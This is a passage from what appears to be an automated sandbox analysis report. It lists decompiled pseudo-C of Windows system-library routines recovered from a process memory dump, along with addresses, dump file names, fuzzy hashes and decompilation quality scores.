L49; } else { _t82 = 0; __eflags = 0; while(1) { *(_t104 - 0x38) = _t82; __eflags = _t82 - *0x11a84c0; if(_t82 >= *0x11a84c0) { break; } __eflags = _t74; if(_t74 == 0) { _t77 = E01189063(_t82 * 0xc + *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99); __eflags = _t77; if(_t77 == 0) { _t74 = 0; __eflags = 0; } else { _t74 = _t77 + 0xfffffff4; } *(_t104 - 0x34) = _t74; _t82 = _t82 + 1; continue; } break; } _t102 = _t102 + 1; continue; } goto L20; } __eflags = _t74; } } } break; } L20: *((intOrPtr*)(_t99 + 0xf4)) = *((intOrPtr*)(_t104 + 4)); *((char*)(_t99 + 0xe5)) = 1; *((char*)(_t104 - 0x1d)) = 1; goto L21; } } L21: *(_t104 - 4) = 0xfffffffe; E010B922A(_t99); _t64 = E010D7D50(); __eflags = _t64; if(_t64 != 0) { _t67 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } else { _t67 = 0x7ffe0386; } __eflags = *_t67; if( *_t67 != 0) { _t67 = E01188B58(_t99); } __eflags = *((char*)(_t104 - 0x1d)); if( *((char*)(_t104 - 0x1d)) != 0) { __eflags = _t99 - *0x11a86c0; // 0x5e07b0 if(__eflags != 0) { __eflags = _t99 - *0x11a86b8; // 0x0 if(__eflags == 0) { _t94 = 0x11a86bc; _t87 = 0x11a86b8; goto L27; } else { __eflags = _t67 | 0xffffffff; asm("lock xadd [edi], eax"); if(__eflags == 0) { E010B9240(_t80, _t99, _t99, _t102, __eflags); } } } else { _t94 = 0x11a86c4; _t87 = 0x11a86c0; L27: E010E9B82(_t80, _t87, _t94, _t99, _t102, __eflags); } } } else { goto L13; } } } } return E0110D130(_t80, _t99, _t102); } else { *_t51 = 0x11a5388; *((intOrPtr*)(_t51 + 4)) = _t84; *_t84 = _t51; *0x11a538c = _t51; goto L6; } } } 0x010b9082 0x010b9083 0x010b9084 0x010b9085 0x010b9087 0x010b9096 0x010b9098 0x010b9098 0x010b909e 0x010b90a8 0x010b90e7 0x010b90e7 0x010b90aa 0x010b90b0 0x010b90b7 0x010b90bd 0x010b90dd 0x010b90e6 0x010b90bf 0x010b90bf 0x010b90c7 0x010b90cf 0x010b90f1 0x010b90f2 0x010b90f4 0x010b90f5 0x010b90f6 0x010b90f7 0x010b90f8 0x010b90f9 0x010b90fa 0x010b90fb 0x010b90fc 0x010b90fd 0x010b90fe 0x010b90ff 0x010b9100 0x010b9102 0x010b9107 0x010b910c 0x010b9110 0x010b9113 0x010b9115 0x010b9136 0x010b913f 0x010b9143 0x011137e4 0x011137e4 0x010b9117 0x010b9117 0x010b911d 0x00000000 0x010b911f 0x010b911f 0x010b9125 0x00000000 0x010b9127 0x010b912d 0x010b9130 0x010b9134 0x010b9158 0x010b915d 0x010b9161 0x010b9168 0x01113715 0x010b916e 0x010b916e 0x010b9175 0x010b9177 0x010b917e 0x010b917f 0x010b9182 0x010b9182 0x010b9187 0x010b9187 0x010b918a 0x010b918d 0x010b918f 0x010b9192 0x010b9195 0x010b9198 0x010b9198 0x010b9198 0x010b919a 0x00000000 0x00000000 0x0111371f 0x01113721 0x01113727 0x0111372f 0x01113733 0x01113735 0x01113738 0x0111373b 0x0111373d 0x01113740 0x00000000 0x01113746 0x01113746 0x01113749 0x00000000 0x0111374f 0x0111374f 0x01113751 0x01113757 0x01113759 0x0111375c 0x0111375c 0x0111375e 0x0111375e 0x01113761 0x01113764 0x00000000 0x00000000 0x01113766 0x01113768 0x011137a3 0x011137a3 0x011137a5 0x011137a7 0x011137ad 0x011137b0 0x011137b2 0x011137bc 0x011137c2 0x011137c2 0x011137b2 0x010b9187 0x010b9187 0x010b918a 0x010b918d 0x010b918f 0x010b9192 0x010b9195 0x00000000 0x010b9195 0x00000000 0x0111376a 0x0111376a 0x0111376a 0x0111376c 0x0111376c 0x0111376f 0x01113775 0x00000000 0x00000000 0x01113777 0x01113779 0x01113782 0x01113787 0x01113789 0x01113790 0x01113790 0x0111378b 0x0111378b 0x0111378b 0x01113792 0x01113795 0x00000000 0x01113795 0x00000000 0x01113779 0x01113798 0x00000000 0x01113798 0x00000000 0x01113768 0x0111379b 0x0111379b 0x01113751 0x01113749 0x00000000 0x01113740 0x010b91a0 0x010b91a3 0x010b91a9 0x010b91b0 0x00000000 0x010b91b0 0x010b9187 0x010b91b4 0x010b91b4 0x010b91bb 0x010b91c0 0x010b91c5 0x010b91c7 0x011137da 0x010b91cd 0x010b91cd 0x010b91cd 0x010b91d2 0x010b91d5 0x010b9239 0x010b9239 0x010b91d7 0x010b91db 0x010b91e1 0x010b91e7 0x010b91fd 0x010b9203 0x010b921e 0x010b9223 0x00000000 0x010b9205 0x010b9205 0x010b9208 0x010b920c 0x010b9214 0x010b9214 0x010b920c 0x010b91e9 0x010b91e9 0x010b91ee 0x010b91f3 0x010b91f3 0x010b91f3 0x010b91e7 0x00000000 0x00000000 0x00000000 0x010b9134 0x010b9125 0x010b911d 0x010b914e 0x010b90d1 0x010b90d1 0x010b90d3 0x010b90d6 0x010b90d8 0x00000000 0x010b90d8 0x010b90cf

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6859d6f4c5e9977bc92457eb3a6b6fe49771edaf929abcbd9d7c2b2435c1fcb5 Instruction ID: 96c5fa4e7cf7920271591471b392f11f7697a6d632161adb4e8c95a3b3e497d5 Opcode Fuzzy Hash: 6859d6f4c5e9977bc92457eb3a6b6fe49771edaf929abcbd9d7c2b2435c1fcb5 Instruction Fuzzy Hash: CE01F4B29156019FC36A8F08D880B55BBEAEF81324F218076F6419B692C370DC81CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E01184015(signed int __eax, signed int __ecx) { void* __ebx; void* __edi; signed char _t10; signed int _t28; _push(__ecx); _t28 = __ecx; asm("lock xadd [edi+0x24], eax"); _t10 = (__eax | 0xffffffff) - 1; if(_t10 == 0) { _t1 = _t28 + 0x1c; // 0x1e E010D2280(_t10, _t1); *((intOrPtr*)(_t28 + 0x20)) = *((intOrPtr*)( *[fs:0x18] + 0x24)); E010D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11a86ac); E010BF900(0x11a86d4, _t28); E010CFFB0(0x11a86ac, _t28, 0x11a86ac); *((intOrPtr*)(_t28 + 0x20)) = 0; E010CFFB0(0, _t28, _t1); _t18 = *((intOrPtr*)(_t28 + 0x94)); if( *((intOrPtr*)(_t28 + 0x94)) != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18); } _t10 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28); } return _t10; } 0x0118401a 0x0118401e 0x01184023 0x01184028 0x01184029 0x0118402b 0x0118402f 0x01184043 0x01184046 0x01184051 0x01184057 0x0118405f 0x01184062 0x01184067 0x0118406f 0x0118407c 0x0118407c 0x0118408c 0x0118408c 0x01184097

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 7531a9ef69ec7396c4d3581853d4a952f290b9d572c49829597145998b30e48c Instruction ID: a15026948c785c52ee7f5a6b5077910165e8e9144185b83b56819228aa599541 Opcode Fuzzy Hash: 7531a9ef69ec7396c4d3581853d4a952f290b9d572c49829597145998b30e48c Instruction Fuzzy Hash: 4C01A272201A477FD215BF79CD80E97FBACFF55660B000229F54883A11CB24EC12CAE4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%

E011714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) { signed int _v8; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; intOrPtr _v28; short _v54; char _v60; void* __edi; void* __esi; signed char* _t21; intOrPtr _t27; intOrPtr _t33; intOrPtr _t34; signed int _t35; _t32 = __edx; _t27 = __ebx; _v8 = *0x11ad360 ^ _t35; _t33 = __edx; _t34 = __ecx; E010FFA60( &_v60, 0, 0x30); _v20 = _a4; _v16 = _a8; _v28 = _t34; _v24 = _t33; _v54 = 0x1034; if(E010D7D50() == 0) { _t21 = 0x7ffe0388; } else { _t21 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; } _push( &_v60); _push(0x10); _push(0x20402); _push( *_t21 & 0x000000ff); return E010FB640(E010F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34); } 0x011714fb 0x011714fb 0x0117150a 0x01171514 0x01171519 0x0117151b 0x01171526 0x0117152c 0x01171534 0x01171537 0x0117153a 0x01171545 0x01171557 0x01171547 0x01171550 0x01171550 0x01171562 0x01171563 0x01171565 0x0117156a 0x0117157f

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: ad42ea8057e32403757c5b284ec83fb14dd5c9cb20e519b352f643d41e0c37ad Instruction ID: ca548ed3003bec0e9ddd866fae4e94cf5817d157d567381a2adabd87b2925e27 Opcode Fuzzy Hash: ad42ea8057e32403757c5b284ec83fb14dd5c9cb20e519b352f643d41e0c37ad Instruction Fuzzy Hash: 2801B571A00249AFCB14EFA9D842FEEBBB8EF45700F44406AF914EB380D674DA00CB94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%

E0117138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) { signed int _v8; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; intOrPtr _v28; short _v54; char _v60; void* __edi; void* __esi; signed char* _t21; intOrPtr _t27; intOrPtr _t33; intOrPtr _t34; signed int _t35; _t32 = __edx; _t27 = __ebx; _v8 = *0x11ad360 ^ _t35; _t33 = __edx; _t34 = __ecx; E010FFA60( &_v60, 0, 0x30); _v20 = _a4; _v16 = _a8; _v28 = _t34; _v24 = _t33; _v54 = 0x1033; if(E010D7D50() == 0) { _t21 = 0x7ffe0388; } else { _t21 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; } _push( &_v60); _push(0x10); _push(0x20402); _push( *_t21 & 0x000000ff); return E010FB640(E010F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34); } 0x0117138a 0x0117138a 0x01171399 0x011713a3 0x011713a8 0x011713aa 0x011713b5 0x011713bb 0x011713c3 0x011713c6 0x011713c9 0x011713d4 0x011713e6 0x011713d6 0x011713df 0x011713df 0x011713f1 0x011713f2 0x011713f4 0x011713f9 0x0117140e

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: d57f1fcfa26a5810af68eabdbacb378887c1427af5cbede4facd45290ee9315d Instruction ID: c6dc21d98511f9810e5523d4b8f3dc99b74122504ab9e9acdc0e7c5c7e9a5c62 Opcode Fuzzy Hash: d57f1fcfa26a5810af68eabdbacb378887c1427af5cbede4facd45290ee9315d Instruction Fuzzy Hash: 6C019271A04209AFCB14EFA9D842FAEBBB8EF44710F40406AB900EB780D6749A04CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E010B58EC(intOrPtr __ecx) { signed int _v8; char _v28; char _v44; char _v76; void* __edi; void* __esi; intOrPtr _t10; intOrPtr _t16; intOrPtr _t17; intOrPtr _t27; intOrPtr _t28; signed int _t29; _v8 = *0x11ad360 ^ _t29; _t10 = *[fs:0x30]; _t27 = __ecx; if(_t10 == 0) { L6: _t28 = 0x1095c80; } else { _t16 = *((intOrPtr*)(_t10 + 0x10)); if(_t16 == 0) { goto L6; } else { _t28 = *((intOrPtr*)(_t16 + 0x3c)); } } if(E010B5943() != 0 && *0x11a5320 > 5) { E01137B5E( &_v44, _t27); _t22 = &_v28; E01137B5E( &_v28, _t28); _t11 = E01137B9C(0x11a5320, 0x109bf15, &_v28, _t22, 4, &_v76); } return E010FB640(_t11, _t17, _v8 ^ _t29, 0x109bf15, _t27, _t28); } 0x010b58fb 0x010b58fe 0x010b5906 0x010b590a 0x010b593c 0x010b593c 0x010b590c 0x010b590c 0x010b5911 0x00000000 0x010b5913 0x010b5913 0x010b5913 0x010b5911 0x010b591d 0x01111035 0x0111103c 0x0111103f 0x01111056 0x01111056 0x010b593b

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 922b696e967a126a8f26cd2992b28f83cca758b382059d8009500db2c797e540 Instruction ID: b2f41abccabf84e57ee41f81e12d30856f770e22bc2d1dab4c451401da9c58d3 Opcode Fuzzy Hash: 922b696e967a126a8f26cd2992b28f83cca758b382059d8009500db2c797e540 Instruction Fuzzy Hash: 5D01D471A04505EBCB18DB29DC509EE7BB8EF81130F8400A9DA55A7288DF30DD02C654

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010CB02A(intOrPtr __ecx, signed short* __edx, short _a4) { signed char _t11; signed char* _t12; intOrPtr _t24; signed short* _t25; _t25 = __edx; _t24 = __ecx; _t11 = ( *[fs:0x30])[0x50]; if(_t11 != 0) { if( *_t11 == 0) { goto L1; } _t12 = ( *[fs:0x30])[0x50] + 0x22a; L2: if( *_t12 != 0) { _t12 = *[fs:0x30]; if((_t12[0x240] & 0x00000004) == 0) { goto L3; } if(E010D7D50() == 0) { _t12 = 0x7ffe0385; } else { _t12 = ( *[fs:0x30])[0x50] + 0x22b; } if(( *_t12 & 0x00000020) == 0) { goto L3; } return E01137016(_a4, _t24, 0, 0, _t25, 0); } L3: return _t12; } L1: _t12 = 0x7ffe0384; goto L2; } 0x010cb037 0x010cb039 0x010cb03b 0x010cb040 0x0111a60e 0x00000000 0x00000000 0x0111a61d 0x010cb04b 0x010cb04e 0x0111a627 0x0111a634 0x00000000 0x00000000 0x0111a641 0x0111a653 0x0111a643 0x0111a64c 0x0111a64c 0x0111a65b 0x00000000 0x00000000 0x00000000 0x0111a66c 0x010cb057 0x010cb057 0x010cb057 0x010cb046 0x010cb046 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d Instruction ID: 8416bee090a08b1b64ecd7c2e817de08c81b16adb5824f6a083e3a0f748467c4 Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d Instruction Fuzzy Hash: 9C01D4322015C09FE326871CD944F6ABBE8EF81B80F0904B5FA55CB655D728DC40CA24

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E01181074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) { char _v8; void* _v11; unsigned int _v12; void* _v15; void* __esi; void* __ebp; char* _t16; signed int* _t35; _t22 = __ebx; _t35 = __ecx; _v8 = __edx; _t13 = !( *__ecx) + 1; _v12 = !( *__ecx) + 1; if(_a4 != 0) { E0118165E(__ebx, 0x11a8ae4, (__edx - *0x11a8b04 >> 0x14) + (__edx - *0x11a8b04 >> 0x14), __edi, __ecx, (__edx - *0x11a8b04 >> 0x14) + (__edx - *0x11a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14)); } E0117AFDE( &_v8, &_v12, 0x8000, *((intOrPtr*)(_t35 + 0x34)), *((intOrPtr*)(_t35 + 0x38))); if(E010D7D50() == 0) { _t16 = 0x7ffe0388; } else { _t16 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; } if( *_t16 != 0) { _t16 = E0116FE3F(_t22, _t35, _v8, _v12); } return _t16; } 0x01181074 0x01181080 0x01181082 0x0118108a 0x0118108f 0x01181093 0x011810ab 0x011810ab 0x011810c3 0x011810cf 0x011810e1 0x011810d1 0x011810da 0x011810da 0x011810e9 0x011810f5 0x011810f5 0x011810fe

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6158d4e3c0417f81b8cd24de522a21c32966e6226f967489d6a53c89ee62b800 Instruction ID: bd853a6941e5bda769037a52c4738775b19ecdb9fa5a97c5e044bd25e20a515b Opcode Fuzzy Hash: 6158d4e3c0417f81b8cd24de522a21c32966e6226f967489d6a53c89ee62b800 Instruction Fuzzy Hash: 61012473604742AFC718EF28DD00B5A7BE9BB84214F04C629F98593290EF30D842CB92

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%

E0116FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { signed int _v12; intOrPtr _v24; intOrPtr _v28; intOrPtr _v32; short _v58; char _v64; void* __edi; void* __esi; signed char* _t18; intOrPtr _t24; intOrPtr _t30; intOrPtr _t31; signed int _t32; _t29 = __edx; _t24 = __ebx; _v12 = *0x11ad360 ^ _t32; _t30 = __edx; _t31 = __ecx; E010FFA60( &_v64, 0, 0x30); _v24 = _a4; _v32 = _t31; _v28 = _t30; _v58 = 0x267; if(E010D7D50() == 0) { _t18 = 0x7ffe0388; } else { _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; } _push( &_v64); _push(0x10); _push(0x20402); _push( *_t18 & 0x000000ff); return E010FB640(E010F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31); } 0x0116fe3f 0x0116fe3f 0x0116fe4e 0x0116fe58 0x0116fe5d 0x0116fe5f 0x0116fe6a 0x0116fe72 0x0116fe75 0x0116fe78 0x0116fe83 0x0116fe95 0x0116fe85 0x0116fe8e 0x0116fe8e 0x0116fea0 0x0116fea1 0x0116fea3 0x0116fea8 0x0116febd

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: e4bbd8133b6444954be7fc4619a56ad4d9471e8271e29a46302a52259543b65e Instruction ID: 88892fff3ed88bf0d7cb7eb3af18577b693b49d8a08278995d0603bd9cfff8ce Opcode Fuzzy Hash: e4bbd8133b6444954be7fc4619a56ad4d9471e8271e29a46302a52259543b65e Instruction Fuzzy Hash: 1D018871E00219ABDB14DFA9D846FAEBBB8EF44704F00406AF900DB781DA759911C795

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%

E0116FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { signed int _v12; intOrPtr _v24; intOrPtr _v28; intOrPtr _v32; short _v58; char _v64; void* __edi; void* __esi; signed char* _t18; intOrPtr _t24; intOrPtr _t30; intOrPtr _t31; signed int _t32; _t29 = __edx; _t24 = __ebx; _v12 = *0x11ad360 ^ _t32; _t30 = __edx; _t31 = __ecx; E010FFA60( &_v64, 0, 0x30); _v24 = _a4; _v32 = _t31; _v28 = _t30; _v58 = 0x266; if(E010D7D50() == 0) { _t18 = 0x7ffe0388; } else { _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; } _push( &_v64); _push(0x10); _push(0x20402); _push( *_t18 & 0x000000ff); return E010FB640(E010F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31); } 0x0116fec0 0x0116fec0 0x0116fecf 0x0116fed9 0x0116fede 0x0116fee0 0x0116feeb 0x0116fef3 0x0116fef6 0x0116fef9 0x0116ff04 0x0116ff16 0x0116ff06 0x0116ff0f 0x0116ff0f 0x0116ff21 0x0116ff22 0x0116ff24 0x0116ff29 0x0116ff3e

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: c8f574a37b927a5523c0c4d254843ca74ebb477bf14d5165cbeb8a0124c1a333 Instruction ID: a1e680a183411f5500700eba80d030d940905e5932eb4392f5ab7faedbb05ef0 Opcode Fuzzy Hash: c8f574a37b927a5523c0c4d254843ca74ebb477bf14d5165cbeb8a0124c1a333 Instruction Fuzzy Hash: 51018871A00209ABDB14DBA9D846FAFBBB8EF45700F40406ABA00DB380DA759911C7D5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%

E01188A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) { signed int _v12; intOrPtr _v24; intOrPtr _v28; intOrPtr _v32; intOrPtr _v36; intOrPtr _v40; short _v66; char _v72; void* __ebx; void* __edi; void* __esi; signed char* _t18; signed int _t32; _t29 = __edx; _v12 = *0x11ad360 ^ _t32; _t31 = _a8; _t30 = _a12; _v66 = 0x1c20; _v40 = __ecx; _v36 = __edx; _v32 = _a4; _v28 = _a8; _v24 = _a12; if(E010D7D50() == 0) { _t18 = 0x7ffe0386; } else { _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } _push( &_v72); _push(0x14); _push(0x20402); _push( *_t18 & 0x000000ff); return E010FB640(E010F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31); } 0x01188a62 0x01188a71 0x01188a79 0x01188a82 0x01188a85 0x01188a89 0x01188a8c 0x01188a8f 0x01188a92 0x01188a95 0x01188a9f 0x01188ab1 0x01188aa1 0x01188aaa 0x01188aaa 0x01188abc 0x01188abd 0x01188abf 0x01188ac4 0x01188ada

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: ef0cfd5a47c861f6e54a6b5ee3ad2c519959f27a2e362427be4e88070bbbcb69 Instruction ID: 1d84680943630ce585c970f0307b03bb0cbf2561040369da6eedc576f0731d68 Opcode Fuzzy Hash: ef0cfd5a47c861f6e54a6b5ee3ad2c519959f27a2e362427be4e88070bbbcb69 Instruction Fuzzy Hash: 58012CB1A0021DAFCB04EFA9D9419EEBBB8EF58310F50405AFA04E7381D734A900CBA0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%

E01188ED6(intOrPtr __ecx, intOrPtr __edx) { signed int _v8; signed int _v12; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; intOrPtr _v28; intOrPtr _v32; intOrPtr _v36; short _v62; char _v68; signed char* _t29; intOrPtr _t35; intOrPtr _t41; intOrPtr _t42; signed int _t43; _t40 = __edx; _v8 = *0x11ad360 ^ _t43; _v28 = __ecx; _v62 = 0x1c2a; _v36 = *((intOrPtr*)(__edx + 0xc8)); _v32 = *((intOrPtr*)(__edx + 0xcc)); _v20 = *((intOrPtr*)(__edx + 0xd8)); _v16 = *((intOrPtr*)(__edx + 0xd4)); _v24 = __edx; _v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001; if(E010D7D50() == 0) { _t29 = 0x7ffe0386; } else { _t29 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } _push( &_v68); _push(0x1c); _push(0x20402); _push( *_t29 & 0x000000ff); return E010FB640(E010F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42); } 0x01188ed6 0x01188ee5 0x01188eed 0x01188ef0 0x01188efa 0x01188f03 0x01188f0c 0x01188f15 0x01188f24 0x01188f27 0x01188f31 0x01188f43 0x01188f33 0x01188f3c 0x01188f3c 0x01188f4e 0x01188f4f 0x01188f51 0x01188f56 0x01188f69

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 4b37512edd44e786b9443d1e2a23b60f63f57433eb97b7100d54061419d4dde5 Instruction ID: 1bd6073916fa68365836bd13dec79bde8f052c07df0f84896c01a66e4bf7229d Opcode Fuzzy Hash: 4b37512edd44e786b9443d1e2a23b60f63f57433eb97b7100d54061419d4dde5 Instruction Fuzzy Hash: 8A111E70A0020A9FDB04EFA9D441BAEBBF4FF08300F4442AAE518EB781E6349940CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010BDB60(signed int __ecx) { intOrPtr* _t9; void* _t12; void* _t13; intOrPtr _t14; _t9 = __ecx; _t14 = 0; if(__ecx == 0 || *((intOrPtr*)(__ecx)) != 0) { _t13 = 0xc000000d; } else { _t14 = E010BDB40(); if(_t14 == 0) { _t13 = 0xc0000017; } else { _t13 = E010BE7B0(__ecx, _t12, _t14, 0xfff); if(_t13 < 0) { L010BE8B0(__ecx, _t14, 0xfff); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14); _t14 = 0; } else { _t13 = 0; *((intOrPtr*)(_t14 + 0xc)) = *0x7ffe03a4; } } } *_t9 = _t14; return _t13; } 0x010bdb64 0x010bdb66 0x010bdb6b 0x010bdbaa 0x010bdb71 0x010bdb76 0x010bdb7a 0x010bdba3 0x010bdb7c 0x010bdb87 0x010bdb8b 0x01114fa1 0x01114fb3 0x01114fb8 0x010bdb91 0x010bdb96 0x010bdb98 0x010bdb98 0x010bdb8b 0x010bdb7a 0x010bdb9d 0x010bdba2

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1 Instruction ID: e71f80c197610f2cb92926123180f9c55e404c25d266bc358025bac5669901b6 Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1 Instruction Fuzzy Hash: EAF0C233241A23DBD7326AE988D0FEBFA959F91B64F160035F2859B344CE64880287E5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) { signed char* _t13; intOrPtr _t22; char _t23; _t23 = __edx; _t22 = __ecx; if(E010D7D50() != 0) { _t13 = ( *[fs:0x30])[0x50] + 0x22a; } else { _t13 = 0x7ffe0384; } if( *_t13 != 0) { _t13 = *[fs:0x30]; if((_t13[0x240] & 0x00000004) == 0) { goto L3; } if(E010D7D50() == 0) { _t13 = 0x7ffe0385; } else { _t13 = ( *[fs:0x30])[0x50] + 0x22b; } if(( *_t13 & 0x00000020) == 0) { goto L3; } return E01137016(0x14a4, _t22, _t23, _a4, _a8, 0); } else { L3: return _t13; } } 0x010bb1e8 0x010bb1ea 0x010bb1f3 0x01114a17 0x010bb1f9 0x010bb1f9 0x010bb1f9 0x010bb201 0x01114a21 0x01114a2e 0x00000000 0x00000000 0x01114a3b 0x01114a4d 0x01114a3d 0x01114a46 0x01114a46 0x01114a55 0x00000000 0x00000000 0x00000000 0x010bb20a 0x010bb20a 0x010bb20a 0x010bb20a

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b Instruction ID: 4776af5d194441824eadf0aaa75e79685b2abbd4e726c1673d11db526659b40e Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b Instruction Fuzzy Hash: C201F4336006809BD326A75DD844FA9BBD8EF92B54F0A00B1FA558BAB6D778C800C315

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 46%

